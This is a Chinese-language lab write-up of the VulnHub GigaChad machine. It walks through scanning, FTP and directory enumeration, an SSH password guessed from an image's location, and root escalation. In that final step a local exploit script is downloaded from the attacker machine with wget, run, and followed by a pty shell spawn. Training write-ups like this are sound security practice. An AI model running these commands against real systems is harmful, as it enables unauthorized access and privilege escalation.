環境
Kali: 192.168.132.131
靶機:192.168.132.143 靶機地址:https://www.vulnhub.com/entry/gigachad-1,657/
一、資訊收集
nmap -sP 192.168.132.0/24

nmap -p- -A 192.168.132.143

二、漏洞探測
查看ftp服務,下載檔案

查看檔案

判斷檔案型別,為zip檔案

解壓檔案,判斷檔案型別并打開,提示用戶名為chad,password可能在dirppinchad.png中


對網站目錄進行爆破,網站有許多代碼為301的垃圾檔案,需要繞過301
gobuster dir -u http://192.168.132.143 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -b 400,403,404,500,301 -t 100 -x .php,.html,.txt --wildcard

檢查robots.txt


觀察圖片,嘗試進行識別圖片標志地理位置,獲得建筑物名稱

三、漏洞驗證
嘗試使用建筑物名稱作為密碼的關鍵字,進行登錄
ssh [email protected]

cat user.txt

四、提權
lsb_release -a
uname -a

#查找高權限命令
find / -perm -u=s -type f 2>/dev/null

發現可疑的程式,上網站查找是郵箱,查找是否有可利用的漏洞

攻擊機,使用python開啟臨時http服務器


控制靶機訪問攻擊機,并下載提權腳本
方法一(推薦)
wget http://192.168.132.132/47172.sh

方法二(需要輸入密碼)
scp [email protected]/usr/share/exploitdb/exploits/multiple/local/47172.sh /tmp/
#修改腳本,去掉無用回車符號
sed -i "s/\r//" 47172.sh
chmod +x 47172.sh
直接運行,失敗

修改將“base_dir”從“/var/tmp”更改為“/tmp”,然后它就可以正常運行了, 但是我們仍然沒有得到root shell

然后我將 47172.sh 復制到 exp.sh,更改一些 var,
./47172.sh & ./exp.sh

#獲得互交式shell
python -c 'import pty; pty.spawn("/bin/bash")'
進入root目錄,獲得另一半flag

五、總結
這套靶機難易程度容易,使用nmap進行埠掃描,可以ftp匿名登錄,下載檔案收集資訊,目錄爆破,通過對圖片進行識別,使用地名作為密碼嘗試登錄ssh,獲得shell,查找高權限命令,發現可疑程式為郵箱,使用searchsploit工具搜索該郵箱可以利用的漏洞,利用漏洞腳本進行提權,獲得root權限,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/302415.html
標籤:其他
